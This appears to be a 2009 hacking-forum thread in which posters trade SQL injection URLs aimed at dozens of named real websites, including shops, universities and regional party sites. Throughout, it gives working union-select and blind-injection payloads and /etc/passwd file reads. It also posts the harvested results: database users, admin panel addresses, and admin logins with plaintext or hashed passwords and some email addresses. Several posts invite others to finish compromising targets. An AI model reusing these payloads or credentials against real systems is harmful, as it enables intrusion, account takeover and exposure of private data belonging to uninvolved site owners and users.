http://www.yogaold.com/index.php?ID=16&m=1&id=-133'+union+select+concat_ws(0x3a,version(),databas e(),user()),2/*
DrAssault
27.03.2009, 19:41
http://www.unity-online.ru/prod.php?ctov=pleers&where=model&all=4U&idm=-1+UNION+SELECT+1,2,3,4,table_name,6,7,8,9,10,11,12 ,13,14+from+information_schema.tables+limit+1,1/*
site: cultpohod.ru
http://www.cultpohod.ru/blockdetal.php?id=-267+union+select+1,2,3,4,5,concat_ws(0x3a3a,versio n(),database(),user()),7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22--
4.0.25::wwwcultpohodru::cultpoho@bux.hc.ru
DrAssault
27.03.2009, 20:30
http://www.ghp.kodar.net/index.php?id=-66+union+select+1,2,3,concat_ws(0x3a,id,name,passw ord),5,6,7+from+users/*
M.W.N.N.
27.03.2009, 22:25
http://www.phos.be/newsletter/index.php?id=00062+union+select+1,2,3,concat(versi on(),0x3a,database(),0x3a,user()),5+limit+1,1
version():5.0.67-log
database():phos_phos
user():phos_w@209.68.4.63
laedafess
28.03.2009, 00:55
http://www.waza.org/virtualzoo/factsheet.php?id=106-007-0093-001'+union+select+1,2,3,4,5,concat_ws(0x3a,user(), database(),version()),7,8,9,0,1,2,3,4,5,6,7,8,9,0, 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0/*&view=Monkeys
http://www.waza.org/virtualzoo/factsheet.php?id=106-007-0093-001'+union+select+1,2,3,4,5,concat_ws(0x3a,user,pa ss),7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9, 0,1,2,3,4,5,6,7,8,9,0+from+admins/*&view=Monkeys
administrator:648233e399d5b7f1dfe2f058fd24b391:man doua
Admin panel:
http://waza.org/admin/
user(): wazaorg_wazaweb@localhost
database(): wazaorg_Network
version(): 4.1.25
PR: 7
---------------------------------------------------
http://www.eyemagazine.com/issue.php?id=18+and+substring((select+version()+fr om+information_schema.tables+limit+0,1),1,1)=5/*
user(): haymarket@localhost
database(): haymarket
version(): 5.0.22-Debian_0ubuntu6.06.11-log
PR: 6
---------------------------------------------------
http://www.all-media.info/page.php?id=19'+union+select+1,concat_ws(0x3a,user (),database(),version()),3,4,5,6,7+limit+1,1/*
http://www.all-media.info/page.php?id=19'+union+select+1,load_file('/etc/passwd'),3,4,5,6,7+limit+1,1/*
user(): all-media@localhost
database(): allmedia
version(): 4.1.18-standard
PR: 5
M.W.N.N.
28.03.2009, 02:09
http://www.chateaudeseneffe.be/aVenirDetail.php?id=236+union+select+1,2,3,4,5,con cat(version(),0x3a,database(),0x3a,user()),7,8,9,1 0,11/*
version():5.0.22-community-max-nt
database():chateaudeseneffe
user():seneffe@cp287.mysite4now.com
DrAssault
28.03.2009, 07:46
http://www.positionsmart.co.za/admin/view_request.php?id=-6+union+select+1,2,3,concat_ws(0x3a,version(),user (),database()),5,6,7,8,9,10,11,12/*
Shaitan-Devil
28.03.2009, 09:58
PR5 TIC 240
http://www.butik.ru/goods/view/gd480001'+union+select+1,2,3,4,concat(email,0x3a,p ass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+fro m+user+limit+5,1/*.html
mailbrush
28.03.2009, 10:30
All injections were checked against Antiboyan (http://bestquest.info/sql/) and then added to its database!
http://gamingusa.org/vsp-core/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
gusa_gusa@localhost:gusa_vsp:5.0.67-community-log
http://stat-cod2.lline.net/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
wage@localhost:cod2-statistic:5.0.32-Debian_7etch8-log
http://quake3.scatplus.ru/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
root@localhost:vsp:5.1.30
http://quake3.scatplus.ru/themes/bismarck/gamestat.php?gameID=-1+union+select+LOAD_FILE(CHAR(47,101,116,99,47,112 ,97,115,115,119,100)),2&config=cfg-default.php
/etc/passwd
file_priv=Y
http://www.sp33d.ws/ffa-instagib/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
q3stats@localhost:q3stats:5.0.32-Debian_7etch8-log
http://nest.deb.hu/stat_sie/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
stat@localhost:stat_sie:5.0.32-Debian_7etch1
http://www.clan-victory.co.uk/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
tilionor_clanvic@localhost:tilionor_clanvictory:5. 0.67-community-log
http://www.dcd.ru/more.php?id=-10+union+select+1,concat_ws(0x3a,version(),databas e(),user())--
db : 5.0.51
name_db : db_dcd
user : dcd@localhost
http : //www.dcd.ru/admin
http://www.sokol-mebel.ru/details/index.php?id=-8+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8,9,10,11,12,13--
db : 5.0.67-log
name_db : u97809
user: u97809@10.10.223.241
http://www.sokol-mebel.ru/admin
Cennarios
28.03.2009, 14:41
http://www.univie.ac.at/unique/?tid=-1+union+select+1,2,3,4,5,concat_ws(0x3a3a,name,pwd ),7,8,9,10,11,12,13,14,15,16,17+from+users+limit+0 ,1/*
PR8
https://www.univie.ac.at/ZID/cms/ <- admin panel
laguia.us
In short, nothing fancy, an SQL injection:
http://www.laguia.us/articulo.php?id=-1242+UNION+SELECT+1,2,3,4,5,6,7,concat_ws(0x3a,use r(),database(),version()),9,10,11/*&edicion=93
revistalaguia@localhost:revistalaguia:5.0.45
since it's MySQL 5, we use INFORMATION_SCHEMA to look at the table and column names
admuser-login,password
http://www.laguia.us/articulo.php?id=-1242+UNION+SELECT+1,2,3,4,5,6,7,concat_ws(0x3a,log in,password),9,10,11+FROM+admusers/*&edicion=93
admin:2cad00b70163edcf:calvin79
admin panel
http://www.laguia.us/admin/
Couldn't upload a shell =\
Cennarios
28.03.2009, 17:07
http://www.filzmooserhof.at/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,concat_ws(0x3a3a ,benutzername_usr,passwort_usr),28,29,30,31,32+fro m+user_usr+limit+0,1--
http://www.filzmooserhof.at/cms/
the accounts work
P.S. To _I7ad1a_: if you post an SQL injection, write it out in full rather than just a dumb quote mark, otherwise you'll be getting downvotes
<<Building Supply Base>>
http://www.stroi-baza.ru/articles/one.php?id=-551+union+select+1,table_name,3,4,5,6,7,8,9+from+i nformation_schema.tables+limit+200,1--
db : 5.0.45
name_db : stroibaza
user : u23827@90.156.210.182
log: Troitsa
pass: 54321
<<Ugolok furniture showroom chain>>
http://www.ugol-ok.ru/model-mebel.php?id=10869&grm=-701+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3--
db : 4.0.27-log
name_db : skynet
user : skynet@zvm2.host.ru
ph1l1ster
28.03.2009, 18:44
dcmp.bc.edu
pr:6
http://dcmp.bc.edu/news.php?id=8+AND+ascii(lower(substring(concat(use r(),0x3a,version(),database()),2,1)))%3E1
Database Version: 3.23.53
Database name: dcmp
User name: root@localhost
water.grace.edu
http://water.grace.edu/news.php?id=-8+union+Select+1,2,3,4,concat(user,0x3a,password), 6+from+mysql.user
Database Version: 4.1.22-community-nt
Database name: water
User name: lehman_group@localhost
marketing.pdx.edu
http://marketing.pdx.edu/news.php?id=63+AND+ascii(lower(substring(concat(us er(),0x3a,version(),0x3a,database()),1,1)))%3E1
Database Version: 5.0.4
Database name: wwwpdxdb
User name: angell.bestla.oit.pdx.edu
Shaitan-Devil
28.03.2009, 18:57
The whole database in plain view
http://shop.e12.cz/index.php?page=katalog&model=287&level=3&parent=-135+union+select+1,2,3,4,5,6,concat_ws(0x2e,table_ schema,table_name,column_name),8,9,10,11,12+from+i nformation_schema.columns/*
<<Sofas here>>
http://www.divan-tam.ru/transform.php?id=-4+union+select+1,2,3,concat_ws(0xa,user_email,user _pass,user_nick,user_name)+from+admin_users--
db : 5.1.24-rc-log
name_db : db28065m
user : m28065@fhe10.hoster.ru
table: admin_user
log: Crusader
pass: 123321
email: ed@divan-tut.ru
M.W.N.N.
28.03.2009, 20:01
http://www.uitpers.be/artikel_view.php?id=1904+union+select+1,2,3,4,conc at(version(),0x3a,database(),0x3a,user()),6,7,8+li mit+1,1/*
version():4.1.25
database():uitpers_main
user():uitpers_main@localhost
http://gpstracks.nl/fietsroutes-be-limburg.php?id=1986+union+select+1,2,3,concat(vers ion(),0x3a,database(),0x3a,user()),5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+l imit+1,1
version():5.0.51a-24-log
database():gpstracks
user():gpstracks@localhost
<<All Furniture of Russia>>
http://www.allfurniture.ru/news.php?id=-162'+union+select+1,concat_ws(0x3a,version(),datab ase(),user())--+
db : 5.0.77
name_db : allfurniture2
user : allfurniture2@localhost
http://www.allfurniture.ru/phpmyadmin/
table: users
log: admin
pass: dczvt
+limit+x,x--+
spherics
28.03.2009, 21:59
PR - 6
http://www.sustainable.ie/directory/category.php?id=68768758595431+union+select+concat _ws(0x3a,version(),user(),database())--
Database Version: 5.0.45-community-log
Database name: cultiva_directory
User name: cultiva_admin@web20.hosting365.ie
PR - 6
http://www.activelink.ie/irish/organisation.php?id=397879879875457+union+select+1 ,2,3,concat_ws(0x3a,version(),user(),database()),5 ,6,7,8,9,10--
Version:4.1.20-log
User:active_r@localhost
Database:active_db1
PR - 6
http://www.snag.ie/eventinfo.php?id=36876876876098097+union+select+1, concat_ws(0x3a,version(),user(),database()),3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
Version: 5.0.24-log
User: thenets_root@localhost
Database: thenets_snagdb
PR - 6
http://www.cusai.ie/person.php?id=37+union+select+1,concat_ws(0x3a,ver sion(),user(),database()),3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20--
Version : 5.0.51
User: beamsys_cusai@web6.novara.ie
Database: beamsys_cusai
PR - 6
http://www.bodywhys.ie/news.php?id=6565587687637987+union+select+1,2,3,4, 5,6,7,8,9,10,11,12,13,concat_ws(0x3a,version(),use r(),database()),15,16,17,18,19,20,21,22,23,24,25,2 6,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42, 43,44,45,46,47,48,49,50,51--
Version: 5.0.51a-community
User: bodywhys_7656@localhost
Database: bodywhys_news
PR - 6
http://www.ie.bilkent.edu.tr/en/seminars/seminar_detail.php?id=679877987377987+union+select +1,2,concat_ws(0x3a,version(),user(),database()),4 ,5,6,7,8,9,10--
Version:5.0.32-Debian_7etch6-log
User: www-user@localhost
Database: sedepartment
PR - 5
http://www.comp.dit.ie/website07/staff.php?id=79855434379877+union+select+1,2,conca t_ws(0x3a,version(),user(),database()),4,5,6,7,8,9 ,10,11,12,13,14--
Version: 5.0.21-community-nt
User: bduggan@localhost
Database: soc
http://www.ifom-firc.it/research_news/abstract.php?id=99999+union+select+1,2,3,4,5,6,7,v ersion(),9/*
database: 4.1.19
name_database: news
user: researchnews@localhost
Please help finish this one off :)
http://www.cra.org/govaffairs/content.php?cid=-22%20UNION%20SELECT%201%20--
To f0ox: to me this looks like a blind SQL injection
http://www.cra.org/govaffairs/content.php?cid=22+AND+SUBSTRING((y() ),1,1)=x/*
y=version,database,user
x=33..127
Version : 4.0.27-standard
database : govsitecontent
User : root@localhost
M.W.N.N.
29.03.2009, 03:54
http://www.media-academie.be/index.php?id=172%27+union+select+1,2,3,4,5,6,7,8,9 ,concat(version(),0x3a,database(),0x3a,user()),11, 12/*
version():4.0.27-log
database():v160_mediaaca
user():v160_mediaaca@localhost
http://www.bamp-bg.org/read.php?id=-184+union+select+1,2,unhex(hex(concat_ws(0x3a,vers ion(),database(),useR()))),4,5,6,7,8
Database Version: 4.1.14-log
Database name: bamp
User name: _pmab@localhost
http://www.bamp-bg.org/read.php?id=-184+union+select+1,2,unhex(hex(concat_ws(0x3a,id,n ame,pass))),4,5,6,7,8+from+users
8:Elisande:bm/Th81Ou1WzYAI/WiSe4jamMk
6:test:bm8oUJ0UHJ/qgAIw90kQmVKa6w
<<Yabloko: Samara>>
http://www.samara.yabloko.ru/themes/index.phtml?id=-45+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6,7,8,9--
db: 5.0.32-Debian_7etch8-log
name_db: samara
user: samara@localhost
<<Yabloko: Novosibirsk>>
http://www.nsk.yabloko.ru/press/publications/index.phtml?id=-294+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x 3a,version(),database(),user()),12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29--
db: 5.0.32-Debian_7etch8-log
name_db: nsk
user: nsk@localhost
<<Yabloko: Omsk>>
http://omsk.yabloko.ru/persons/index.phtml?id=-47+union+select+1,2,3,4,5,6,7,8,table_name,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31+from+information_schema.tables+limit+31,1--
db: 5.0.32-Debian_7etch8-log
name_db: omsk
user: omsk@localhost
PS. Missed again......
<<Yabloko: Chita>>
http://www.chita.yabloko.ru/persons/index.phtml?id=-2+union+select+1,2,3,4,5,6,7,8,database(),10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31--
db: 5.0.32-Debian_7etch8-log
name_db: chita
user: chita@localhost
Whoever wants to finish it off, here you go....
Sites on the server (ReverseIP):
DrAssault
29.03.2009, 13:12
http://www.lueffyworld.net/sport.php?id=-121+union+select+1,2,3,4,concat_ws(0x3a,user_id,us ername,user_password),6,7,8+from+phpbb_users/*
http://www.roofing.ru/news/text?newsid=-10+union+select+1,2,3,4,5,6,7
user(),database(),version():
roofing_admin@localhost::roofing_bcms::4.0.27-standard
Blind sql-inj
http://www.itp.zp.ua/index.php?showpage=32+and+substring(version(),1,1) =5
spherics
29.03.2009, 17:03
PageRank = 7
http://www.gaeilge.ie/using/terms/cat_search.asp?id=17%20or%201=@@version--
Version: Microsoft SQL Server 2000 - 8.00.679 (Intel X86) Aug 26 2002 15:09:48 Copyright (c) 1988-2000 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
http://www.gaeilge.ie/using/terms/cat_search.asp?id=17%20or%201=(select%20system_use r)--
User: dbase_user
http://www.gaeilge.ie/using/terms/cat_search.asp?id=17%20or%201=(select%20db_name())--
Database: fnag
<<myOpera>>
http://forum.myopera.net/showflat.php?Cat=&Board=newsuser&Number=44645+and+ascii(substring(version(),1,1))=5 3--+
db: 5.0.27
name_db: myopera_myoperarum
user: myopera_myopera@localhost
NOT FOUND BY YOU... If I could, I'd give it a "-"...
http://forum.xakep.ru/fb.aspx?m=1483201
That doesn't mean anything!!!!!! and it doesn't prove that I wasn't the one who found it.....
That's me there, just under a different nick :) what's more, I hijacked that user a week ago......:)
Maybe you did find it yourself, but it was posted earlier...
http://hip-hop.sib.net/music/download.php?id=100+and+substring(@@version,1,1)=4
http://www.cy-pr.com/img_hip-hop.sib.net_6.gif
DrAssault
29.03.2009, 18:36
http://sandpiperleads.com/warrenrupp_register/thanks.php?RegisterID=-9999+UNION+SELECT+user(),2,version()/*
<<Large-Scale Systems Control>>
http://ubs.mtas.ru/search/search_results.php?short_view=0&publication_id=-2621+union+select+1,concat_ws(0x3a,version(),datab ase(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20--+
db: 5.0.44-log
name_db: mtas116_libr
user: mtas116_libr@localhost
And again, blind sql-inj
http://associate.hud.ac.uk/php/showpage.php?pageid=54+and+substring(version(),1,1 )=5
<<Vision Restoration Center>>
http://www.cvz.ru/index.php?id=-10+union+select+1,2,3,4,5,6,concat_ws(0x3a,version (),database(),user()),8--+
db: 4.1.22-log
name_db: wwwcvzru_cmsmy
user: cvz_cmsmy@localhost
<<TEATR.DOC>>
http://www.teatrdoc.ru/plays.php?id=-5+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5--+
db: 4.1.22
name_db: kinoteatr_td
user: kinoteatr_mysql@194.85.92.114
<<Ecodefense>>
http://ecodefense.ru/view.php?id=-431+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a, version(),database(),user()),11--+
db: 4.1.22
name_db: ecodefense
user: ecodefensedb@localhost
"Information Technologies and Tele-Radio Communications" - electronic journal - http://ittc.ksu.ru
http://ittc.ksu.ru/?id=-29+union+select+1,concat(version(),0x3a,database() ,0x3a,user()),3,4,5,6,7,8,9,10,11--
user(): ittcdb@localhost
database(): ittcdb
version(): 5.0.67
PR=4
reading the tables
http://ittc.ksu.ru/?id=-29+union+select+1,table_name,3,4,5,6,7,8,9,10,11+f rom+INFORMATION_schema.tables+limit+0,1--
Holistic Health Yellow Pages and Supersite
http://www.findhealer.com/ref/docdetail.php3?id=-29+union+select+1,version(),3,4,5,6,7,8,9,0,1,2,3, 4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8, 9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3, 4,5,6,7,8,9,0,1,2,3,4,5,6,7,8--
user(): chinamed@localhost
database(): chinamed
version(): 4.1.21-standard
PR=4
http://www.bulgariahousehunting.com/details.php?id=116+AND+SUBSTRING((y=1..3()),1,1)=x--
y1=version
y2=database
y3=user
x=Version : 4.1.22-log
Database : bulgar_house
User : krasig@localhost
-m0rgan-
29.03.2009, 22:11
www.baspublishing.com.au
http://www.baspublishing.com.au/detail.php?id=-1+union+all+select+0,1,concat_ws(0x3a,user,passwor d,file_priv),3,4,5+from+mysql.user--
Login/pass:
root:164378093c1aa083
file_priv - Y
Reads etc/passwd:
http://www.baspublishing.com.au/detail.php?id=-1+union+all+select+0,1,load_file(0x2f6574632f70617 3737764),3,4,5+from+mysql.user--
# $FreeBSD: src/etc/master.passwd,v 1.25.2.1 2001/11/24 17:22:24 gshapiro Exp $ # root:*:0:0:Charlie &:/root:/bin/bash toor:*:0:0:Bourne-again Superuser:/root: daemon:*:1:1:Owner of many system proces
The server is running FreeBSD.
------------------------------------------------------------------
The End!
http://travel.chinavista.com
http://travel.chinavista.com/culture2.php?id=1+union+select+1,table_name+from+i nformation_schema.tables/*
http://www.transtriumf.com/line.php?id=-8+UNION+SELECT+1,2,3,4,5,6,7,8/*
Database Version: 4.0.16-Max-log
Database name: transtriumf
User name: transtriumf@localhost
<<NovoNews>>
http://www.novonews.lv/index.php?mode=news&id=-70666'+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws (0x3a,version(),database(),user()),12,13,14,15--+
db: 5.0.22-log
name_db: novonews_v2
user: novonews_v2_adm@192.168.1.1
log: dima
pass: amid643
email: dimzulu@gmail.com
http://www.novonews.lv/admin/index.php?login
<<Stomatitis>>
http://www.dentoprofile.ru/php/content.php?id=577+and+ascii(substring(version(),1 ,1))=52--+
database: 4.0.16
<<SFCB>>
http://www.sfcb.org/php/category.php?id=1+union+select+1,concat_ws(0x3a,ve rsion(),database(),user()),3,4,5,6,7,8,9,10,11,12/*
db: 4.1.22
name_db: sfcb
user: sfcbor@localhost
<<AveDesk>>
http://www.avedesk.org/desklet.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8,9,10--
db: 5.0.67
name_db: dfilezon_avedesk
user: dfilezon_ave@localhost
log: addd
pass: fff
ПаВлУшКа
30.03.2009, 14:45
http://www.ausit.org/eng/showpage.php3?id=-650+union+select+concat_ws(0x20,version(),database (),user()),2,3
Database Version: 4.1.25-log
Database name: ausit2
User name: dream@localhost
M.W.N.N.
30.03.2009, 15:08
http://www.conferencedes19cpas.irisnet.be/cpas2.php?id=4+union+select+1,unhex(hex(concat(ver sion(),0x3a,database(),0x3a,user()))),3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30+limit+1,1/*
version():4.1.11-Debian_4sarge8-log
database():db_cpasbru
user():cpasbru@organa.irisnet.be
__
http://w3.iihe.ac.be/About_Us/ident_people_iihe.php?ID=8+union+select+1,2,concat (version(),0x3a,database(),0x3a,user()),4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28+from+mysql.user+limit+1,1/*
version():5.0.27
database():IIHE
user():root@localhost
http://w3.iihe.ac.be/About_Us/ident_people_iihe.php?ID=8+union+select+1,2,concat (user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28+from+mysql .user+limit+1,1/*
root:710789ba2a55b808
http://w3.iihe.ac.be/About_Us/ident_people_iihe.php?ID=8+union+select+1,2,load_f ile(%27/etc/passwd%27),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20,21,22,23,24,25,26,27,28+from+mysql.user+limi t+1,1/*
<<MAXIM>>
http://www.maxim-stroy.ru/catalog/index.php?id=-80+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,versi on(),database(),user()),9,10,11,12,13--+
db: 5.0.67-log
name_db: u72532
user: u72532@10.10.223.239
log: admin
pass: max77
-m0rgan-
30.03.2009, 16:21
www.auroragroup.com.au
Columns from Information_schema:
articles,galleries,photos,phplist_admin,phplist_ad min_attribute,phplist_admin_task,phplist_adminattr ibute,phplist_attachment,phplist_bounce,phplist_bo unceregex,phplist_bounceregex_bounce,phplist_confi g,phplist_eventlog,phplist_linktrack,phplist_linkt rack_userclick,phplist_list,phplist_listmessage,ph plist_listrss,phplist_listuser,phplist_message,php list_message_attachment,phplist_messagedata,phplis t_rssitem,phplist_rssitem_data,phplist_rssitem_use r,phplist_sendprocess,phplist_subscribepage,phplis t_subscribepage_data,phplist_task,phplist_template ,phplist_templateimage,phplist_urlcache,phplist_us er_attribute,phplist_user_blacklist,phplist_user_b lacklist_data,phplist_user_message_bounce,phplist_ user_message_forward,phplist_user_rss,phplist_user _user,phplist_user_user_attribute,php Return to gallery
The phplist_admin column caught my interest
Its structure:
id,loginname,namelc,email,created,modified,modifie dby,password,passwordchanged,superuser,disabled
Output:
http://www.auroragroup.com.au/viewphoto.php?id=-1+union+all+select+0,1,2,concat_ws(0x3a,id,loginna me,namelc,email,created,modified,modifiedby,passwo rd,passwordchanged,superuser,disabled)+from+phplis t_admin--
------------------------------------------------------------------------------------------------------
The End!
<<Bulletin Board>>
http://www.infoboard.reporter-studio.ru/idv.php?id=-7947'+union+select+1,2,3,4,5,6,concat_ws(0x3a,vers ion(),database(),user()),8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28--+
db: 5.0.51a-community-nt-log
name_db: 1gb_reporter4
user: 1gb_reporter4@81.176.226.44
http://www.infoboard.reporter-studio.ru/admin/
log: admin
pass: 374982
<<Coursework Empire>>
http://www.kursovic.ru/showdoc.php?id=-100022+union+select+version()--+
db: 4.0.27
name_db: kursovic
user: kursovic@54valuehost.ru
<<Products. STC "Kardeya">>
http://www.kardeya.ru/index.php?main=catalog&id=-3570+union+select+1,unhex(hex(version())),3,4,5--+
db: 4.1.16-nt
name_db: kardeya
user: kardeya@localhost
Blind SQL-inj
http://associate.hud.ac.uk/php/showpage.php?pageid=54+and+ascii(lower(substring( апрос,1,1)))=значение
version: 5.0.37
database: assoc_web
user: assocweb@localhost
M.W.N.N.
30.03.2009, 19:10
http://www.frso.be/blog.php?bid=10%27+union+select+1,2,3,4,concat(ver sion(),0x3a,database(),0x3a,user()),6,7,8,9,10,11, 12+limit+1,1/*
version():5.0.45
database():frso
user():frso@localhost
___
http://www.joodscultuurfestival.be/event.php?id=40+union+select+1,2,3,4,concat(versio n(),0x3a,database(),0x3a,user()),6,7,8,9,10,11+lim it+1,1/*
version():4.1.22-standard-log
database():joodscultuurfestival
user():detrezl@213.193.229.176
http://www.joodscultuurfestival.be/event.php?id=40+union+select+1,2,3,4,concat(id,0x3 a,user,0x3a,pass),6,7,8,9,10,11+from+admin+limit+1 ,1
/*
http://www.joodscultuurfestival.be/admin/
id:login:password
1:lev:b59c67bf196a4758191e42f76670ceba = 1111
<<Construction in Moscow>>
http://www.mos-stroi.ru/cats.php?id=-94600+union+select+1,2,3,4,5,concat_ws(0x3a,versio n(),database(),user()),7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28--+
db: 5.0.67-community
name_db: ruprom_ruprom
user: ruprom@localhost
M.W.N.N.
30.03.2009, 19:20
http://www.donorinfo.be/fiche.php?ProjectID=126+union+select+1,2,3,4,5,6,7 ,8,concat(version(),0x3a,database(),0x3a,user()),1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43 ,44,45,46,47,48,49,50,51,52,53,54+limit+1,1/*
version():4.1.22-standard-log
database():donorinfo
user():donorinfo@192.168.0.26
_
http://www.gastenkamersantwerpen.be/pub/member.php?id=6+union+select+concat(version(),0x3a ,database(),0x3a,user()),2,3,4,5,6,7,8,9,10+limit+ 1,1
version():5.0.67-community-log
database():kbpkrgxq_BBAntwerp
user():kbpkrgxq_wolf@localhost
http://www.gastenkamersantwerpen.be/pub/member.php?id=6+union+select+concat(email,0x3a,use rname,0x3a,password),2,3,4,5,6,7,8,9,10+from+users +limit+1,1
http://www.gastenkamersantwerpen.be/cms/index.php
login:pass:email
admin:asimov:wolf@pandora.be
<<Denis Kolisnichenko. Documentation on Linux and PHP. Do-it-yourself Linux server>>
http://www.dkws.org.ua/index.php?page=fcat&id=-12+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6--
db: 5.1.30
name_db: dkwsorgu_team
user: dkwsorgu_team@localhost
http://www.dkws.org.ua/admin/ - :) :) :) if you're in a bad mood, drop by.....
table: phpbb_users
log: Bear
pass: 270576
+limit+1x1-- - and all the users are in plain view.
<<Business Information Club "Saint Petersburg">>
http://www.stpeteclub.ru/news/new.php?id=-287+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4--+
db: 4.0.27-log
name_db: new
user: new@localhost
http://www.stpeteclub.ru/admin/
log: adm2in
pass: re4hb5wf
ПаВлУшКа
31.03.2009, 00:41
http://sascha.loeffler.gs/downloadwahl.php?id=-12+union+select+1,concat_ws(0x20,user(),database() ,version()),3,4,5--
version():5.0.32-Debian_7etch8-log
database():sascha
user():sascha@localhost
http://promcomplekt.com/products/view.php?pid=1075+union+select+1+limit+1,1/*
Database Version: 5.0.24-standard
Database name: db_promcomplekt1
User name: promcomplekt1@localhost
BlackSun
31.03.2009, 11:54
http://www.crackdb.com/get.php?id=-1%27+union+select+1,2,Password,4,5,6,7,8,9,10,11,1 2,13,14,15,16+from+mysql.user+--+
http://www.rdholding.ru/get.php?id=-1+union+select+1,2,0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2 f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2 e2e2f2e2e2f2e2e2f6574632f706173737764,4,5,6,7,8+--+
http://www.nfodb.com/get.php?id=-1%27+union+select+1,2,3,4,5,LOAD_FILE(%27/etc/passwd%27),7,8,9,10,11,12,13,14,15,16,17,18,19+fro m+files+--+
http://www.hackzone.us/forum/?a=open&fid=1&id=-1+union+select+11,1,10,9,table_name,7,6,5,4,3,2+fr om+information_schema.tables+limit+35,1+--+
http://www.tusculumpioneers.com/sport.php?id=-10+union+select+1,2,aes_decrypt(aes_encrypt(versio n(),0x61),0x61),4,5,6,7,8,9,10,11,12+--+
<<GK International Institute of Management>>
http://www.gkmim.ru/index.php?area=table&shose=-1'+union+select+1,concat_ws(0x20,version(),databas e(),user())--+
db: 5.0.76
name_db: gkmim
user: gkmim@localhost
http://www.gkmim.ru/admin/
table: phpbb_users
log: gkmim-admin
pas: 991c1e56f1c6e0c03c72bf95611194de :(
users:
log: Марина
pas: 123
+limit+x,x--+
http://s1701.zouo.ru/site.php?id=-34+union+select+unhex(hex(version())),2,3--+
db: 4.1.16-nt
name_db: s1701
user: s1701@localhost
http://s1701.zouo.ru/manager/
table: phpbb_users
log: nachalka
pas: 1701nachalka
Target: www.cbc.bb
Evil link: http://www.cbc.bb/index.pl/article?id=-1+union+select+1,2,version(),user(),5,6,7,database (),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36,37
version: 4.0.27-standard-log
user: csite28@AdServNode1
database: csite28_CPSG
Reading local files:
http://www.cbc.bb/index.pl/article?id=-1+union+select+1,2,load_file('/etc/passwd'),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,3 6,37
ПаВлУшКа
31.03.2009, 20:07
http://www.audepp.org/boxSeccion.php?id=106+and+substring(version(),1,1) =4
http://www.photos-gallery.net/subcategory.php?id=-1012+union+select+version()--
http://www.sai.org.uy/website/iframes/novedad_ampliada.php?id=-44+union+select+1,2,3,4,5,6,version(),8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23--
spherics
31.03.2009, 21:12
http://www.ccaabelem.com.br/?pg=conteudoq&id=7987986491+union+select+1,concat_ws(0x3a,versio n(),user(),database()),3,4,5,6,7,8,9,10,11--
Database Version: 5.0.22
Database name: ccaabelem
User name: ccaabelem@189-38-86-3.net2.com.br
Administrators
